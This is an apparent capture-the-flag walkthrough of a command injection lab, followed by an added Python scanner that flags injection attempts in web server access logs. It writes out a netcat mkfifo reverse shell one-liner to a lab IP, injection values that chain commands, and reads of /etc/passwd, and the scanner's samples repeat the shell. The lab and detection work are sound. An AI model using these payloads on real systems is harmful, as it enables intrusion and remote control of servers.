Injection

An introduction to Command Injection

Blind Command Injection


Let's go to the webpage


Let's try to find the kernel version, redirect it to a file, and then read the file



Now let's enter root and look at the response for the answer to the next question


Now let's enter www-data


Let's enter our name and see what the output is


Active Command Injection


Let's go to the webpage that they mention

Let's list the files with the ls command and see if there is an interesting one

There is an interesting file

To see how many users there are on the machine, we can read the /etc/passwd file

We can look at this output by going to the source code


We can see which user the app is running as with the whoami command


We can see what this user's shell is set as in the /etc/passwd file


We can see what version of Ubuntu is running by using the command lsb_release -a


We can print out the MOTD with this command


Get the Flag!
Let's first get a reverse shell on the machine so that we can navigate through it more easily.
First we start a netcat listener

Now we use the reverse shell command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Let's hit Submit

We have a shell, let's stabilize it

Let's now look for the flag. It might be a txt file, maybe called flag, so let's look for that
find / -type f -name flag.txt 2>/dev/null

We have the flag, let's read it
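
From the defender's side, every input used in this walkthrough reaches the web server as a request parameter, so it is visible in the access log. The following is an added example, not part of the original walkthrough or the room's application: a small Python scanner that decodes query parameters from combined-format log lines and flags shell metacharacters, the recon commands used above, and the mkfifo reverse shell shape. The /app path, the input parameter name and the log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Shell metacharacters that let input break out of the intended command.
META = re.compile(r"[;|&`<>]|\$\(")
# Named-pipe reverse shell shape: mkfifo plus a shell wired to nc.
FIFO_SHELL = re.compile(r"mkfifo\s+\S+.*\b(?:sh|bash)\b.*\bnc\b", re.S)
# Recon commands and paths used in this walkthrough.
RECON = re.compile(r"\b(?:whoami|uname|lsb_release)\b|/etc/passwd")
# Client IP and request target from a combined-format access log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

def classify(value):
    """Return the findings for one URL-decoded parameter value."""
    findings = []
    if FIFO_SHELL.search(value):
        findings.append("fifo-reverse-shell")
    if META.search(value):
        findings.append("shell-metachar")
    if RECON.search(value):
        findings.append("recon-command")
    return findings

def scan(lines):
    """Yield (client_ip, parameter, findings) for each suspicious value."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            findings = classify(value)
            if findings:
                yield m["ip"], name, findings

def _line(ip, value):
    """Build one constructed log line; /app and 'input' are hypothetical."""
    return (f'{ip} - - [01/Jan/2024:00:00:00 +0000] '
            f'"GET /app?input={quote_plus(value)} HTTP/1.1" 200 512')

SAMPLE = [  # constructed requests, not captured traffic
    _line("192.0.2.10", "alice"),
    _line("192.0.2.11", "root; uname -r > kernel.txt"),
    _line("192.0.2.11", "whoami"),
    _line("192.0.2.11", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
                        "|nc 10.13.8.64 1234 >/tmp/f"),
]

if __name__ == "__main__":
    for ip, param, findings in scan(SAMPLE):
        print(ip, param, ",".join(findings))
```

Forms that submit with POST do not appear in the query string, so the same classify function would need to be fed request bodies from a WAF or application log instead.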
